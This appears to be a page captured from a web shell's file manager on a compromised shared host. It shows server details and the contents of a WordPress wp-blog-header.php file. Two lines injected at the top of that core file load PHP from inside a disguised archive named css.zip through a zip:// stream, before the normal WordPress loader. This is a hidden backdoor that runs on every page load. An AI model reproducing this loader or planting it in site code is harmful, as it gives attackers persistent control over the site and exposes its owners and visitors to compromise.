HEX
Server: Apache/2.4.63 (Unix)
System: Linux free32.beget.ru 5.10.239-0-beget-acl-test #1 SMP Fri Jul 11 14:08:01 UTC 2025 x86_64
User: n96454p5 (3415)
PHP: 8.3.20
Disabled: NONE
Upload Files
File: /home/n/n96454p5/n96454p5.beget.tech/public_html/wp-blog-header.php
<?php
$zlj = 'zip://';
require $zlj.'css.zip#index.php';
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

 $wp_did_header = true;

 // Load the WordPress library.
 require_once __DIR__ . '/wp-load.php';

 // Set up the WordPress query.
 wp();

 // Load the theme template.
 require_once ABSPATH . WPINC . '/template-loader.php';

}